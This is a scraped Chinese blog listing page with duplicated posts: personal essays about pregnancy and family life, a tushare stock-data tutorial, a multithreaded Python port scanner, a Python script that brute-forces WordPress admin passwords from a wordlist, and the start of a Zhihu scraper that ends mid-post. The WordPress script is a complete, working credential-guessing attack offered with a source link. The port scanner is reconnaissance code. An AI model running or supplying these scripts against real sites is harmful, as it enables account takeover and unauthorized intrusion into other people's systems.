30天尝试新事情

宝贝，自从有了你

默认分类 • xenia 发表了文章 • 0 个评论 • 3061 次浏览 • 2016-05-20 11:42 • 来自相关话题

一女同事突然间休了一个多月假，见她昨天回来上班了
“亲，许久不见，休假去哪了”
她步履蹒跚的走过来，说了句“哎，累着了”

通过聊天才得知她怀孕了
但由于初期没有发现，过于劳累，现在还处于保胎过程中
她说她其实在这休假一个月
每一次出现任何不好的状况，都让她心惊胆战，百度了无数答案
于求心安
但百度也有更多的不好的答案及评论，让她不寒而栗
她只求快点度过这前三个月，一切顺利就好
也许同样作为孕期，我非常理解她的感受

不禁让我想起了我刚刚过去的“前三个月”
至今记忆犹新
我记得在两个月的时候，突然间胃口全无，无论是厨房油烟的味道，洗手间的味道，甚至打开冰箱门散发出来的味道，都让我的胃翻江倒海
见到曾经我最爱的“肉食” 也都无动于衷
鸡蛋更加不敢碰，还记得当时非常嫌弃吃鸡蛋，还被LG说“太矫情，太公主了”
那段时间内心充满了委屈，经常不自觉的掉眼泪，心想，他怎么这么不理解我呢？

想想平时坐长途车都没事，但那会连坐一趟短暂的公交也吐得稀里哗啦，出门随身都得备着塑胶袋
刚好当时碰上过年假期
本以为可以享受过年大鱼大肉，可惜，每天只能将就吃点白粥咸菜，可怜兮兮
当时，委屈得在给妈妈的电话中难以自拔地放声大哭
不停地说着“ 妈妈，实在太难受了”
妈妈也只能安慰我说”别怕孩子，熬完前三个月就会好起来的，就算吐也要勉强自己多吃点，不要饿坏了“
真的好不容易边强忍着饿，边强忍着吐
就这样，坚持上班，度过了这痛苦的前三个月~

现在才深深明白
只有一个女孩当她自己成为了母亲，才更理解自己的母亲
想起自己叛逆时期，经常顶撞母亲，内心顿时愧疚不已...
以后一定要好好孝敬自己的妈妈才行啊~
十月怀胎真心不易
胎儿的一举一动，每次的孕检数据，都牵动着妈妈的心
还记得去检查唐氏的忐忑，四维彩超的不安，糖耐的痛苦
幸运的是都顺利走过来了
还有几个月就要和宝宝见面了
在接下来的日子里
心里只有一个单纯的愿望“只要宝宝健康，足月出生，平安快乐的成长就好，别无所求”~

查看全部

一女同事突然间休了一个多月假，见她昨天回来上班了
“亲，许久不见，休假去哪了”
她步履蹒跚的走过来，说了句“哎，累着了”

通过聊天才得知她怀孕了
但由于初期没有发现，过于劳累，现在还处于保胎过程中
她说她其实在这休假一个月
每一次出现任何不好的状况，都让她心惊胆战，百度了无数答案
于求心安
但百度也有更多的不好的答案及评论，让她不寒而栗
她只求快点度过这前三个月，一切顺利就好
也许同样作为孕期，我非常理解她的感受

不禁让我想起了我刚刚过去的“前三个月”
至今记忆犹新
我记得在两个月的时候，突然间胃口全无，无论是厨房油烟的味道，洗手间的味道，甚至打开冰箱门散发出来的味道，都让我的胃翻江倒海
见到曾经我最爱的“肉食” 也都无动于衷
鸡蛋更加不敢碰，还记得当时非常嫌弃吃鸡蛋，还被LG说“太矫情，太公主了”
那段时间内心充满了委屈，经常不自觉的掉眼泪，心想，他怎么这么不理解我呢？

想想平时坐长途车都没事，但那会连坐一趟短暂的公交也吐得稀里哗啦，出门随身都得备着塑胶袋
刚好当时碰上过年假期
本以为可以享受过年大鱼大肉，可惜，每天只能将就吃点白粥咸菜，可怜兮兮
当时，委屈得在给妈妈的电话中难以自拔地放声大哭
不停地说着“ 妈妈，实在太难受了”
妈妈也只能安慰我说”别怕孩子，熬完前三个月就会好起来的，就算吐也要勉强自己多吃点，不要饿坏了“
真的好不容易边强忍着饿，边强忍着吐
就这样，坚持上班，度过了这痛苦的前三个月~

现在才深深明白
只有一个女孩当她自己成为了母亲，才更理解自己的母亲
想起自己叛逆时期，经常顶撞母亲，内心顿时愧疚不已...
以后一定要好好孝敬自己的妈妈才行啊~
十月怀胎真心不易
胎儿的一举一动，每次的孕检数据，都牵动着妈妈的心
还记得去检查唐氏的忐忑，四维彩超的不安，糖耐的痛苦
幸运的是都顺利走过来了
还有几个月就要和宝宝见面了
在接下来的日子里
心里只有一个单纯的愿望“只要宝宝健康，足月出生，平安快乐的成长就好，别无所求”~

陪着你长大

默认分类 • xenia 发表了文章 • 0 个评论 • 3957 次浏览 • 2016-05-18 14:14 • 来自相关话题

女同事三三两两一起吃中饭时，免不了会聊到带娃，婆媳相处等家庭琐事~

其中一位同事讲起她和她婆婆相处的经历，让我印象颇深~
由于工作原因，把小孩放在老家留给婆婆带
如今小孩2岁了，当她好不容易请假回到老家看小孩时，发现自己的孩子跟城里的孩子相去甚远
不讲卫生
脾气暴躁
内心孤僻
更为严重的是，连自己的妈妈都不认识，在她婆婆的引导下，竟然把婶婶当做妈妈来喊
她内心隐隐作痛
心里咬着牙要把小孩接到城里，和自己相处
可惜小孩早已习惯了奶奶，离不开奶奶了，一时之间无法强行让小孩也奶奶分开~
就这样又独自一人返回城里工作
可是她的心五味杂陈~

如果不是现实万般无奈
相信很少人会让自己的小孩成为留守儿童~
虽然很理解这位女同事的境遇，但内心泛起涟漪~
做父母的，是否就可以只管生，不管养呢
然后以工作的理由，就把小孩轻易丢给老人带呢
还是要尽自己最大努力，把小孩留在自己身边，一点一滴的教育呢

我自己也即将成为母亲了
看到这么多留守儿童的问题，我暗自下定决心
不管有多难
我都要陪着孩子一起长大~

查看全部

女同事三三两两一起吃中饭时，免不了会聊到带娃，婆媳相处等家庭琐事~

其中一位同事讲起她和她婆婆相处的经历，让我印象颇深~
由于工作原因，把小孩放在老家留给婆婆带
如今小孩2岁了，当她好不容易请假回到老家看小孩时，发现自己的孩子跟城里的孩子相去甚远
不讲卫生
脾气暴躁
内心孤僻
更为严重的是，连自己的妈妈都不认识，在她婆婆的引导下，竟然把婶婶当做妈妈来喊
她内心隐隐作痛
心里咬着牙要把小孩接到城里，和自己相处
可惜小孩早已习惯了奶奶，离不开奶奶了，一时之间无法强行让小孩也奶奶分开~
就这样又独自一人返回城里工作
可是她的心五味杂陈~

如果不是现实万般无奈
相信很少人会让自己的小孩成为留守儿童~
虽然很理解这位女同事的境遇，但内心泛起涟漪~
做父母的，是否就可以只管生，不管养呢
然后以工作的理由，就把小孩轻易丢给老人带呢
还是要尽自己最大努力，把小孩留在自己身边，一点一滴的教育呢

我自己也即将成为母亲了
看到这么多留守儿童的问题，我暗自下定决心
不管有多难
我都要陪着孩子一起长大~

30天学会量化交易模型 Day02

量化交易-Ptrade-QMT • 李魔佛发表了文章 • 0 个评论 • 20962 次浏览 • 2016-05-17 16:30 • 来自相关话题

github同步代码： https://github.com/Rockyzsu/stock
30天学会量化交易模型 Day01

接着上一篇，如果已经掌握了pandas数据类型的各种使用，就可以进入tushare数据的抓取环节。

tushare安装教程：
pip install tushare ＃最傻瓜且最快的安装方式

使用方法：

说明：
获取个股历史交易数据（包括均线数据），可以通过参数设置获取日k线、周k线、月k线，以及5分钟、15分钟、30分钟和60分钟k线数据。本接口只能获取近3年的日线数据，适合搭配均线数据进行选股和分析，如果需要全部历史数据，请调用下一个接口get_h_data()。

参数说明：

code：股票代码，即6位数字代码，或者指数代码（sh=上证指数 sz=深圳成指 hs300=沪深300指数 sz50=上证50 zxb=中小板 cyb=创业板）
start：开始日期，格式YYYY-MM-DD
end：结束日期，格式YYYY-MM-DD
ktype：数据类型，D=日k线 W=周 M=月 5=5分钟 15=15分钟 30=30分钟 60=60分钟，默认为D
retry_count：当网络异常后重试次数，默认为3
pause:重试时停顿秒数，默认为0

返回值说明：

date：日期
open：开盘价
high：最高价
close：收盘价
low：最低价
volume：成交量
price_change：价格变动
p_change：涨跌幅
ma5：5日均价
ma10：10日均价
ma20:20日均价
v_ma5:5日均量
v_ma10:10日均量
v_ma20:20日均量
turnover:换手率[注：指数无此项]

如果要获取所有的历史数据，可以使用 ts.get_h_data(股票代码，开始日期，结束日期）即可。

ts.get_hist_data('600848',start='2015-01-05',end='2015-01-09')

其它的一些参数：

接着学习数据的存储：

首先来扫一下盲： csv和excel的区别：

excel中后缀为csv和xls，二者区别如下：
1、xls 文件就是Microsoft excel电子表格的文件格式。
2、csv是最通用的一种文件格式，它可以非常容易地被导入各种PC表格及数据库中。此文件，一行即为数据表的一行。生成数据表字段用半角逗号隔开。
csv是文本文件,用记事本就能打开，XLS是二进制的文件只有用EXCEL才能打
csv文件是以逗号为分隔符号，将各字段列分离出的一种ASCII文件。
csv(*.csv) 文件格式只能保存活动工作表中的单元格所显示的文本和数值。工作表中所有的数据行和字符都将保存。
数据列以逗号分隔，每一行数据都以回车符结束。如果单元格中包含逗号，则该单元格中的内容以双引号引起。

保存为csv格式

############################
获取股市市场的基本信息：

stock_info=ts.get_stock_basics()

包含了
"""
获取沪深上市公司基本情况
Return
--------
DataFrame
code,代码
name,名称
industry,细分行业
area,地区
pe,市盈率
outstanding,流通股本
totals,总股本(万)
totalAssets,总资产(万)
liquidAssets,流动资产
fixedAssets,固定资产
reserved,公积金
reservedPerShare,每股公积金
eps,每股收益
bvps,每股净资
pb,市净率
timeToMarket,上市日期
"""

获取所有股市的代码：
stock_info=ts.get_stock_basics()
def get_all_stock_id():
#获取所有股票代码
for i in stock_info.index:
print i

下一篇：30天学会量化交易模型 Day03
链接：http://30daydo.com/article/15

查看全部

github同步代码： https://github.com/Rockyzsu/stock
30天学会量化交易模型 Day01

接着上一篇，如果已经掌握了pandas数据类型的各种使用，就可以进入tushare数据的抓取环节。

tushare安装教程：
pip install tushare ＃最傻瓜且最快的安装方式

使用方法：

说明：
获取个股历史交易数据（包括均线数据），可以通过参数设置获取日k线、周k线、月k线，以及5分钟、15分钟、30分钟和60分钟k线数据。本接口只能获取近3年的日线数据，适合搭配均线数据进行选股和分析，如果需要全部历史数据，请调用下一个接口get_h_data()。

参数说明：

code：股票代码，即6位数字代码，或者指数代码（sh=上证指数 sz=深圳成指 hs300=沪深300指数 sz50=上证50 zxb=中小板 cyb=创业板）
start：开始日期，格式YYYY-MM-DD
end：结束日期，格式YYYY-MM-DD
ktype：数据类型，D=日k线 W=周 M=月 5=5分钟 15=15分钟 30=30分钟 60=60分钟，默认为D
retry_count：当网络异常后重试次数，默认为3
pause:重试时停顿秒数，默认为0

返回值说明：

date：日期
open：开盘价
high：最高价
close：收盘价
low：最低价
volume：成交量
price_change：价格变动
p_change：涨跌幅
ma5：5日均价
ma10：10日均价
ma20:20日均价
v_ma5:5日均量
v_ma10:10日均量
v_ma20:20日均量
turnover:换手率[注：指数无此项]

如果要获取所有的历史数据，可以使用 ts.get_h_data(股票代码，开始日期，结束日期）即可。

ts.get_hist_data('600848',start='2015-01-05',end='2015-01-09')

其它的一些参数：

接着学习数据的存储：

首先来扫一下盲： csv和excel的区别：

excel中后缀为csv和xls，二者区别如下：
1、xls 文件就是Microsoft excel电子表格的文件格式。
2、csv是最通用的一种文件格式，它可以非常容易地被导入各种PC表格及数据库中。此文件，一行即为数据表的一行。生成数据表字段用半角逗号隔开。
csv是文本文件,用记事本就能打开，XLS是二进制的文件只有用EXCEL才能打
csv文件是以逗号为分隔符号，将各字段列分离出的一种ASCII文件。
csv(*.csv) 文件格式只能保存活动工作表中的单元格所显示的文本和数值。工作表中所有的数据行和字符都将保存。
数据列以逗号分隔，每一行数据都以回车符结束。如果单元格中包含逗号，则该单元格中的内容以双引号引起。

保存为csv格式

############################
获取股市市场的基本信息：

stock_info=ts.get_stock_basics()

包含了
"""
获取沪深上市公司基本情况
Return
--------
DataFrame
code,代码
name,名称
industry,细分行业
area,地区
pe,市盈率
outstanding,流通股本
totals,总股本(万)
totalAssets,总资产(万)
liquidAssets,流动资产
fixedAssets,固定资产
reserved,公积金
reservedPerShare,每股公积金
eps,每股收益
bvps,每股净资
pb,市净率
timeToMarket,上市日期
"""

获取所有股市的代码：

stock_info=ts.get_stock_basics()

def get_all_stock_id():

    #获取所有股票代码

    for i in stock_info.index:

        print i

下一篇：30天学会量化交易模型 Day03
链接：http://30daydo.com/article/15

女生30岁~

默认分类 • xenia 发表了文章 • 0 个评论 • 3896 次浏览 • 2016-05-17 12:01 • 来自相关话题

最近
一位女性好友失恋，恰逢30岁，这个年龄在中国社会是一个大龄剩女的坎，心急如焚的坎
突然间4年的感情不翼而飞，而后深夜买醉，少了一个人在身边，让她觉得异常孤单
哭过，卑微挽留过
剩下仅存骄傲让她咬着一股气，马不停蹄的开始报名各大交友网站，下班后积极参加各式交友俱乐部的交友活动
只要遇到不会心生讨厌的男生，就开始加微信，交换电话，私聊热聊
到处撒网
她说：不知何时，感觉自己成了一个结婚狂，怕自己30以后没人要了”~

我特别理解她的感受，曾经我也在28岁失恋后，心急如焚过~
而当我29岁时，在一个陌生的城市，遇到了生命中的他（这些都不是我能预计的）
幸福就像命中注定的出现了~
所以作为过来人，我只能安慰和鼓励她“ 亲爱的，请相信属于你的缘分是一定存在的”
这句轻描淡写的话，不知道对她有没有任何温暖的作用
但是在中国这样一个社会，看到一个30岁的女生为了把自己嫁出去，作出的不懈努力，看到她每次开心地和我分享找到潜在发展的对象时，作为朋友的我，除了祝福外，能给的就是深深的拥抱~然后跟她说“只要你幸福就好”~

查看全部

最近
一位女性好友失恋，恰逢30岁，这个年龄在中国社会是一个大龄剩女的坎，心急如焚的坎
突然间4年的感情不翼而飞，而后深夜买醉，少了一个人在身边，让她觉得异常孤单
哭过，卑微挽留过
剩下仅存骄傲让她咬着一股气，马不停蹄的开始报名各大交友网站，下班后积极参加各式交友俱乐部的交友活动
只要遇到不会心生讨厌的男生，就开始加微信，交换电话，私聊热聊
到处撒网
她说：不知何时，感觉自己成了一个结婚狂，怕自己30以后没人要了”~

我特别理解她的感受，曾经我也在28岁失恋后，心急如焚过~
而当我29岁时，在一个陌生的城市，遇到了生命中的他（这些都不是我能预计的）
幸福就像命中注定的出现了~
所以作为过来人，我只能安慰和鼓励她“ 亲爱的，请相信属于你的缘分是一定存在的”
这句轻描淡写的话，不知道对她有没有任何温暖的作用
但是在中国这样一个社会，看到一个30岁的女生为了把自己嫁出去，作出的不懈努力，看到她每次开心地和我分享找到潜在发展的对象时，作为朋友的我，除了祝福外，能给的就是深深的拥抱~然后跟她说“只要你幸福就好”~

某周一早上

30天新尝试 • xenia 发表了文章 • 0 个评论 • 3088 次浏览 • 2016-05-16 11:02 • 来自相关话题

某周一的早上，在饭桌上望着闹钟懒洋洋啃着早餐，想着离周五还那么遥远，总有一种崩溃的感觉；任重而道远...习惯开手机，刷微信，不喜欢点赞，不习惯评论，那些晒吃晒喝，晒娃晒照骗的，每天上演，无聊至及；这是无法拒绝的朋友圈...

突然看到朋友圈里一条这样的信息：
“一名杀人犯被判死刑。他必须选择三个房间中的一个受死。第一个房间里燃烧着熊熊烈火。第二个房间里全是刺客，手里都拿着上了子弹的枪。而第三个房间则塞满了3年没有进食的狮子。哪一个房间对他来说比较安全呢？”

嘿嘿，这第一反应是进哪个房间都必死无疑啊~ 请问你是这么想的吗，我承认我是的~
哈，提示扫描二维码，关注后有答案，好奇害死猫，还是傻愣愣的关注了，运营商就这样圈了我这样一个粉，连看个朋友圈都要成为粉，当今世道不是粉貌似都不能活了~

好吧，分析说“死胡同的思维，让我们忘记了 3年没进食的狮子，咋还能起来吃人呢？”

突然不明觉厉~脑袋清醒了很多，尽管面对崩溃的周一，还得去上班啊~

查看全部

某周一的早上，在饭桌上望着闹钟懒洋洋啃着早餐，想着离周五还那么遥远，总有一种崩溃的感觉；任重而道远...习惯开手机，刷微信，不喜欢点赞，不习惯评论，那些晒吃晒喝，晒娃晒照骗的，每天上演，无聊至及；这是无法拒绝的朋友圈...

突然看到朋友圈里一条这样的信息：
“一名杀人犯被判死刑。他必须选择三个房间中的一个受死。第一个房间里燃烧着熊熊烈火。第二个房间里全是刺客，手里都拿着上了子弹的枪。而第三个房间则塞满了3年没有进食的狮子。哪一个房间对他来说比较安全呢？”

嘿嘿，这第一反应是进哪个房间都必死无疑啊~ 请问你是这么想的吗，我承认我是的~
哈，提示扫描二维码，关注后有答案，好奇害死猫，还是傻愣愣的关注了，运营商就这样圈了我这样一个粉，连看个朋友圈都要成为粉，当今世道不是粉貌似都不能活了~

好吧，分析说“死胡同的思维，让我们忘记了 3年没进食的狮子，咋还能起来吃人呢？”

突然不明觉厉~脑袋清醒了很多，尽管面对崩溃的周一，还得去上班啊~

python 多线程扫描开放端口

python • 低调的哥哥发表了文章 • 0 个评论 • 10201 次浏览 • 2016-05-15 21:15 • 来自相关话题

为什么说python是黑客的语言？因为很多扫描+破解的任务都可以用python很快的实现，简洁明了。且有大量的库来支持。import socket,sys
import time
from thread_test import MyThread

socket.setdefaulttimeout(1)
#设置每个线程socket的timeou时间，超过1秒没有反应就认为端口不开放
thread_num=4
#线程数目
ip_end=256
ip_start=0
scope=ip_end/thread_num

def scan(ip_head,ip_low, port):
try:
# Alert !!! below statement should be inside scan function. Else each it is one s
ip=ip_head+str(ip_low)
print ip
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
#通过这一句判断是否连通
s.close()
print "ip %s port %d open\n" %(ip,port)
return True
except:
return False

def scan_range(ip_head,ip_range,port):
start,end=ip_range
for i in range(start,end):
scan(ip_head,i,port)

if len(sys.argv)<3:
print "input ip and port"
exit()

ip_head=sys.argv[1]
port=int(sys.argv[2])

ip_range=
for i in range(thread_num):
x_range=[i*scope,(i+1)*scope-1]
ip_range.append(x_range)

threads=
for i in range(thread_num):
t=MyThread(scan_range,(ip_head,ip_range,port))
threads.append(t)
for i in range(thread_num):
threads.start()
for i in range(thread_num):
threads.join()
#设置进程阻塞，防止主线程退出了，其他的多线程还在运行

print "*****end*****"多线程的类函数实现：有一些测试函数在上面没注释或者删除掉，为了让一些初学者更加容易看懂。import thread,threading,time,datetime
from time import sleep,ctime
def loop1():
print "start %s " %ctime()
print "start in loop1"
sleep(3)
print "end %s " %ctime()

def loop2():
print "sart %s " %ctime()
print "start in loop2"
sleep(6)
print "end %s " %ctime()

class MyThread(threading.Thread):
def __init__(self,fun,arg,name=""):
threading.Thread.__init__(self)
self.fun=fun
self.arg=arg
self.name=name
#self.result

def run(self):
self.result=apply(self.fun,self.arg)

def getResult(self):
return self.result

def fib(n):
if n<2:
return 1
else:
return fib(n-1)+fib(n-2)

def sum(n):
if n<2:
return 1
else:
return n+sum(n-1)

def fab(n):
if n<2:
return 1
else:
return n*fab(n-1)

def single_thread():
print fib(12)
print sum(12)
print fab(12)

def multi_thread():
print "in multithread"
fun_list=[fib,sum,fab]
n=len(fun_list)
threads=
count=12
for i in range(n):
t=MyThread(fun_list,(count,),fun_list.__name__)
threads.append(t)
for i in range(n):
threads.start()

for i in range(n):
threads.join()
result= threads.getResult()
print result
def main():
'''
print "start at main"
thread.start_new_thread(loop1,())
thread.start_new_thread(loop2,())
sleep(10)
print "end at main"
'''
start=ctime()
#print "Used %f" %(end-start).seconds
print start
single_thread()
end=ctime()
print end
multi_thread()
#print "used %s" %(end-start).seconds
if __name__=="__main__":
main()

最终运行的格式就是 python scan_host.py 192.168.1. 22
上面的命令就是扫描192.168.1 ip段开启了22端口服务的机器，也就是ssh服务。

github：https://github.com/Rockyzsu/scan_host

查看全部

为什么说python是黑客的语言？因为很多扫描+破解的任务都可以用python很快的实现，简洁明了。且有大量的库来支持。

import socket,sys

import time

from thread_test import MyThread



socket.setdefaulttimeout(1)

#设置每个线程socket的timeou时间，超过1秒没有反应就认为端口不开放

thread_num=4

#线程数目 

ip_end=256

ip_start=0

scope=ip_end/thread_num



def scan(ip_head,ip_low, port):

    try:

        # Alert !!! below statement should be inside scan function. Else each it is one s

        ip=ip_head+str(ip_low)

	print ip

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	s.connect((ip, port))

	#通过这一句判断 是否连通

        s.close()

	print "ip %s port %d open\n" %(ip,port)

        return True

    except:

        return False





def scan_range(ip_head,ip_range,port):

	start,end=ip_range

	for i in range(start,end):

		scan(ip_head,i,port)



if len(sys.argv)<3:

	print "input ip and port"

	exit()



ip_head=sys.argv[1]

port=int(sys.argv[2])





ip_range=

for i in range(thread_num):

	x_range=[i*scope,(i+1)*scope-1]

	ip_range.append(x_range)



threads=

for i in range(thread_num):

	t=MyThread(scan_range,(ip_head,ip_range,port))

	threads.append(t)

for i in range(thread_num):

	threads.start()

for i in range(thread_num):

	threads.join()

	#设置进程阻塞，防止主线程退出了，其他的多线程还在运行



print "*****end*****"

多线程的类函数实现：有一些测试函数在上面没注释或者删除掉，为了让一些初学者更加容易看懂。

import thread,threading,time,datetime

from time import sleep,ctime

def loop1():

	print "start %s " %ctime()

	print "start in loop1"

	sleep(3)

	print "end %s " %ctime()



def loop2():

	print "sart %s " %ctime()

	print "start in loop2"

	sleep(6)

	print "end %s " %ctime()





class MyThread(threading.Thread):

	def __init__(self,fun,arg,name=""):

		threading.Thread.__init__(self)

		self.fun=fun

		self.arg=arg

		self.name=name

		#self.result



	def run(self):

		self.result=apply(self.fun,self.arg)

	

	def getResult(self):

		return self.result



def fib(n):

	if n<2:

		return 1

	else:

		return fib(n-1)+fib(n-2)





def sum(n):

	if n<2:

		return 1

	else:

		return n+sum(n-1)	



def fab(n):

	if n<2:

		return 1

	else:

		return n*fab(n-1)



def single_thread():		

	print fib(12)		

	print sum(12)

	print fab(12)





def multi_thread():

	print "in multithread"

	fun_list=[fib,sum,fab]

	n=len(fun_list)

	threads=

	count=12

	for i in range(n):

		t=MyThread(fun_list,(count,),fun_list.__name__)

		threads.append(t)

	for i in range(n):

		threads.start()



	for i in range(n):

		threads.join()

		result= threads.getResult()

		print result

def main():

	'''

	print "start at main"

	thread.start_new_thread(loop1,())

	thread.start_new_thread(loop2,())

	sleep(10)

	print "end at main"

	'''

	start=ctime()

	#print "Used %f" %(end-start).seconds

	print start	

	single_thread()

	end=ctime()

	print end

	multi_thread()

	#print "used %s" %(end-start).seconds 

if __name__=="__main__":

	main()

最终运行的格式就是 python scan_host.py 192.168.1. 22
上面的命令就是扫描192.168.1 ip段开启了22端口服务的机器，也就是ssh服务。

github：https://github.com/Rockyzsu/scan_host

python 暴力破解wordpress博客后台登陆密码

python爬虫 • 低调的哥哥发表了文章 • 0 个评论 • 23862 次浏览 • 2016-05-13 17:49 • 来自相关话题

自己曾经折腾过一阵子wordpress的博客，说实话，wordpress在博客系统里面算是功能很强大的了，没有之一。
不过用wordpress的朋友可能都是贪图方便，很多设置都使用的默认，我之前使用的某一个wordpress版本中，它的后台没有任何干扰的验证码（因为它默认给用户关闭了，需要自己去后台开启，一般用户是使用缺省设置）。

所以只要使用python+urllib库，就可以循环枚举出用户的密码。而用户名在wordpress博客中就是博客发布人的名字。

所以以后用wordpress的博客用户，平时还是把图片验证码的功能开启，怎样安全性会高很多。（其实python也带有一个破解一个验证码的库 - 。-！）# coding=utf-8
# 破解wordpress 后台用户密码
import urllib, urllib2, time, re, cookielib,sys

class wordpress():
def __init__(self, host, username):
#初始化定义 header ，避免被服务器屏蔽
self.username = username
self.http="http://"+host
self.url = self.http + "/wp-login.php"
self.redirect = self.http + "/wp-admin/"
self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
self.referer=self.http+"/wp-login.php"
self.cook="wordpress_test_cookie=WP+Cookie+check"
self.host=host
self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}
self.cookie = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))

def crash(self, filename):
try:
pwd = open(filename, 'r')
#读取密码文件，密码文件中密码越多破解的概率越大
while 1 :
i=pwd.readline()
if not i :
break

data = urllib.urlencode(
{"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})
Req = urllib2.Request(url=self.url, data=data, headers=self.headers)
#构造好数据包之后提交给wordpress网站后台
Resp = urllib2.urlopen(Req)
result = Resp.read()
# print result
login = re.search(r'login_error', result)
#判断返回来的字符串，如果有login error说明失败了。
if login:
pass
else:
print "Crashed! password is %s %s" % (self.username,i.strip())
g=open("wordpress.txt",'w+')
g.write("Crashed! password is %s %s" % (self.username,i.strip()))
pwd.close()
g.close()
#如果匹配到密码，则这次任务完成，退出程序
exit()
break

pwd.close()

except Exception, e:
print "error"
print e
print "Error in reading password"

if __name__ == "__main__":
print "begin at " + time.ctime()
host=sys.argv[1]
#url = "http://"+host
#给程序提供参数，为你要破解的网址
user = sys.argv[2]
dictfile=sys.argv[3]
#提供你事先准备好的密码文件
obj = wordpress(host, user)
#obj.check(dictfile)
obj.crash(dictfile)
#obj.crash_v()
print "end at " + time.ctime()

github源码：https://github.com/Rockyzsu/crashWordpressPassword
查看全部

自己曾经折腾过一阵子wordpress的博客，说实话，wordpress在博客系统里面算是功能很强大的了，没有之一。
不过用wordpress的朋友可能都是贪图方便，很多设置都使用的默认，我之前使用的某一个wordpress版本中，它的后台没有任何干扰的验证码（因为它默认给用户关闭了，需要自己去后台开启，一般用户是使用缺省设置）。

所以只要使用python+urllib库，就可以循环枚举出用户的密码。而用户名在wordpress博客中就是博客发布人的名字。

所以以后用wordpress的博客用户，平时还是把图片验证码的功能开启，怎样安全性会高很多。（其实python也带有一个破解一个验证码的库 - 。-！）

# coding=utf-8

# 破解wordpress 后台用户密码

import urllib, urllib2, time, re, cookielib,sys





class wordpress():

    def __init__(self, host, username):

		#初始化定义 header ，避免被服务器屏蔽

        self.username = username

        self.http="http://"+host

        self.url =  self.http + "/wp-login.php"

        self.redirect = self.http + "/wp-admin/"

        self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'

        self.referer=self.http+"/wp-login.php"

        self.cook="wordpress_test_cookie=WP+Cookie+check"

        self.host=host

        self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}

        self.cookie = cookielib.CookieJar()

        self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))





    def crash(self, filename):

        try:

            pwd = open(filename, 'r')

			#读取密码文件，密码文件中密码越多破解的概率越大

            while 1 :

                i=pwd.readline()

                if not i :

                    break



                data = urllib.urlencode(

                    {"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})

                Req = urllib2.Request(url=self.url, data=data, headers=self.headers)

				#构造好数据包之后提交给wordpress网站后台

                Resp = urllib2.urlopen(Req)

                result = Resp.read()

                # print result

                login = re.search(r'login_error', result)

				#判断返回来的字符串，如果有login error说明失败了。

                if login:

                    pass

                else:

                    print "Crashed! password is %s %s" % (self.username,i.strip())

                    g=open("wordpress.txt",'w+')

                    g.write("Crashed! password is %s %s" % (self.username,i.strip()))

                    pwd.close()

                    g.close()

					#如果匹配到密码， 则这次任务完成，退出程序

                    exit()

                    break



            pwd.close()



			except Exception, e:

            print "error"

            print e

            print "Error in reading password"





if __name__ == "__main__":

    print "begin at " + time.ctime()

    host=sys.argv[1]

    #url = "http://"+host

	#给程序提供参数，为你要破解的网址

    user = sys.argv[2]

    dictfile=sys.argv[3]

	#提供你事先准备好的密码文件

    obj = wordpress(host, user)

    #obj.check(dictfile)

    obj.crash(dictfile)

    #obj.crash_v()

    print "end at " + time.ctime()

github源码：https://github.com/Rockyzsu/crashWordpressPassword

python爬虫模拟登陆知乎推送知乎文章到kindle电子书获取自己的关注问题

python爬虫 • 低调的哥哥发表了文章 • 0 个评论 • 37776 次浏览 • 2016-05-12 17:53 • 来自相关话题

平时逛知乎，上班的时候看到一些好的答案，不过由于答案太长，没来得及看完，所以自己写了个python脚本，把自己想要的答案抓取下来，并且推送到kindle上，下班后用kindle再慢慢看。平时喜欢的内容也可以整理成电子书抓取下来，等周末闲时看。

#2016-08-19更新：
添加了模拟登陆知乎的模块，自动获取自己的关注的问题id，然后把这些问题的所有答案抓取下来推送到kindle

# -*-coding=utf-8-*-
__author__ = 'Rocky'
# -*-coding=utf-8-*-
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
from email import Encoders, Utils
import urllib2
import time
import re
import sys
import os

from bs4 import BeautifulSoup

from email.Header import Header

reload(sys)
sys.setdefaultencoding('utf-8')

class GetContent():
def __init__(self, id):

# 给出的第一个参数就是你要下载的问题的id
# 比如想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么就输入 python zhihu.py 29372574

id_link = "/question/" + id
self.getAnswer(id_link)

def save2file(self, filename, content):
# 保存为电子书文件
filename = filename + ".txt"
f = open(filename, 'a')
f.write(content)
f.close()

def getAnswer(self, answerID):
host = "http://www.zhihu.com"
url = host + answerID
print url
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
# 构造header 伪装一下
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)

try:
resp = urllib2.urlopen(req)
except:
print "Time out. Retry"
time.sleep(30)
# try to switch with proxy ip
resp = urllib2.urlopen(req)
# 这里已经获取了网页的代码，接下来就是提取你想要的内容。使用beautifulSoup 来处理，很方便
try:
bs = BeautifulSoup(resp)

except:
print "Beautifulsoup error"
return None

title = bs.title
# 获取的标题

filename_old = title.string.strip()
print filename_old
filename = re.sub('[\/:*?"<>|]', '-', filename_old)
# 用来保存内容的文件名，因为文件名不能有一些特殊符号，所以使用正则表达式过滤掉

self.save2file(filename, title.string)

detail = bs.find("div", class_="zm-editable-content")

self.save2file(filename, "\n\n\n\n--------------------Detail----------------------\n\n")
# 获取问题的补充内容

if detail is not None:

for i in detail.strings:
self.save2file(filename, unicode(i))

answer = bs.find_all("div", class_="zm-editable-content clearfix")
k = 0
index = 0
for each_answer in answer:

self.save2file(filename, "\n\n-------------------------answer %s via -------------------------\n\n" % k)

for a in each_answer.strings:
# 循环获取每一个答案的内容，然后保存到文件中
self.save2file(filename, unicode(a))
k += 1
index = index + 1

smtp_server = 'smtp.126.com'
from_mail = 'your@126.com'
password = 'yourpassword'
